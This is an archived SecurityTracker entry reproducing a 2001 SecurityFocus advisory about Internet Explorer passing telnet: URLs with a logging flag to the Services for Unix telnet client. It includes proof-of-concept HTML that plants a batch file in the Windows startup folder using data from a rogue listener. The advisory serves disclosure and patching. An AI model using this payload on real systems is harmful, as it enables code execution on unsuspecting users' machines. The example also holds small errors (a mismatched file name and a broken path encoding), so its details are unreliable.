SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Microsoft Internet Explorer Vendors:   Microsoft
Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host
SecurityTracker Alert ID:  1001088
SecurityTracker URL:  http://securitytracker.com/id/1001088
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 15 2001
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): All versions of IE with Services for Unix 2.0
Description:   SecurityFocus.com discovered and reported a vulnerability in using Microsoft's Internet Explorer (IE) with Microsoft's "Services for Unix 2.0" Telnet client in which a malicious web page or web script can cause the IE web browser to use the telnet client to overwrite or create a file on the browser's host.

The Windows 2000 Telnet client reportedly contains a client side logging feature which is normally used to log telnet session data to a file. This feature is invoked by specifying the "-f" flag to the telnet command, followed by a filename. The vulnerability can be exploited by hiding malicious code that is passed to the telnet command within a web page or an HTML-based e-mail (read by, for example, Microsoft Outlook).

The vulnerability can overwrite or create files and could be used to create a malicious batch file that may be executed by the system.

Some demonstration exploit code is contained in the original report.

All versions of Internet Explorer with Services for Unix 2.0
installed are presumed to be vulnerable to this problem.

Impact:   By hiding malicious code within a web page or an HTML-based e-mail (read by, for example, Microsoft Outlook), an attacker can cause files to be created or overwritten on the user's host (with the privileges of the user reading the HTML). This could lead to the execution of malicious programs on the user's host.
Solution:   The vendor has released updates for Internet Explorer 5.01 Service Pack 1 and Internet Explorer 5.5 Service Pack 1.
Vendor URL:  www.microsoft.com/technet/security/bulletin/MS01-015.asp (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Releases Revised Fix) Re: Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host
The vendor has released an updated fix to supercede the previous fix.



 Source Message Contents

Subject:  Internet Explorer and Services for Unix 2.0 Telnet Client


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                          SecurityFocus.com
                     http://www.securityfocus.com

              Vulnerability Report For Internet Explorer
               and Services for Unix 2.0 Telnet Client



Date Published: 13 March 2001

Advisory ID: n/a

Bugtraq ID: 2463

CVE CAN: None currently assigned.

Title: Services for Unix 2.0 Telnet Client File Overwrite
       Vulnerability

Class: Input Validation Error

Remotely Exploitable: Yes

Locally Exploitable: Yes


Vulnerability Description:
=========================

A vulnerability has been discovered in the interaction between
Internet Explorer and the Telnet client installed with Services
for Unix 2.0, that allows arbitrary files to be overwritten, or
created, containing attacker specified data.  This vulnerability
occurs as a result of Internet Explorer executing the "telnet"
command and passing command line parameters, specified in the
URL, to the telnet program.

The Windows 2000 Telnet client contains a client side logging
option, which is used to log all telnet session data to a file
specified by this option.  By specifying the "-f" flag to the
telnet command, accompanied by a filename, all session text is
logged to this file.


Vulnerable Packages/Systems:
===========================

All versions of Internet Explorer with Services for Unix 2.0
installed are presumed to be vulnerable to this problem.

Solution/Vendor Information/Workaround:

Microsoft has released an update which solves this problem.  The
update, and more information can be obtained at the following
locations:

http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
http://www.microsoft.com/windows/ie/download/critical/q286043/default.
asp

Updates are available for Internet Explorer 5.01 Service Pack 1
and Internet Explorer 5.5 Service Pack 1.


Vendor notified on:
==================

November 1, 2000


Credits:
=======

This vulnerability was discovered by Oliver Friedrichs
<of@securityfocus.com>.

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories please mail vulnhelp@securityfocus.com.


Technical Description - Exploit/Concept Code:
============================================

This vulnerability can be reproduced by giving Internet Explorer a
URL
such as the following:

telnet:-f%20\file.txt%20host

The above example will cause Internet Explorer to invoke the telnet
client and cause it to connect to the host "host", logging all output
to the file "\file.txt".  An attacker can cause arbitrary data to be
written to this file by setting up a rogue server, such as netcat,
which is listening on the telnet port, sending their desired data to
the client.  Arbitrary port numbers can also be specified on the
telnet
command line, so the server need not listen on port 23.

Furthermore, the invocation of the telnet client can be hidden within
existing HTML, automating it's execution.  This vulnerability can
also
be exploited via Outlook, which by default will automatically process
HTML messages.

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>

The above example will cause data that is received from port 8000 on
the host "host" to be written to the file "boom.bat" in the startup
directory for all users.  Assuming the logged in user has the
appropriate permissions, this will create a batch file that is
executed
upon any future user logon.  Note that if the username is known to
the attacker, this can also be directed towards the logged in user,
who will have permission to create this file.


DISCLAIMER:

The contents of this advisory are copyright (c) 2000
SecurityFocus.com
and may be distributed freely provided that no fee is charged for
this
distribution and proper credit is given.




-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBOq6xlcm4FXxxREdXEQI+8wCfcnxnmIR8nDqOgqlGFxa5nbQldUcAoLW6
uW9Hz+AFB3j7rcJga+DGqUlu
=qvCI
-----END PGP SIGNATURE-----


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC